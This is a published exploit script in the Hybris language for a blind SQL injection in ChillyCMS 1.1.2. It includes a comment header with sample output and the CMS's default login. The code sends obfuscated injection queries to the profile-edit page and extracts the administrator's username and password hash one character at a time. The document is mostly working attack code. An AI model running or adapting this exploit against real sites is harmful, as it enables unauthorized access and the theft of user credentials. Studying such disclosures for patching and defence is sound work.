#!/usr/bin/hybris ################################################################################# # # Exploit Title: ChillyCMS Blind Sql Injection # Date: 14-05-2010 # Author: IHTeam # Software Link: http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9 # Version: 1.1.2 # Tested on: Win/Linux # # # Example: # [simone@simons Advisories]$ hybris chillycms.hy # Searching Username... : # admin # Searching MD5... : # d033e22ae348aeb5660fc2140aec35850c4da997 # # # DEFAULT USERNAME AND PASSWORD: # User: jens # Pass: demo # # Thanks to evilsocket for Hybris # http://www.hybris-lang.org/ ################################################################################# import std.*; query1 = "4/**/AND/**/(SELECT/**/SUBSTRING("; query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char("; chars = [48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f']; usr = ""; password = ""; i=1; println("Searching Username... : "); while(1) { found=false; chrs = 'a' .. 'z'; foreach(char of chrs) { _chrs = toint(char); url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { usr += char; i+=1; found=true; } } if (!found) { break; } } println(usr); i=1; println("Searching MD5... : "); while(1) { found=false; foreach(char of chars.keys()) { url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { password += chars[char]; i+=1; found=true; } } if (!found) { break; } } println(password); println();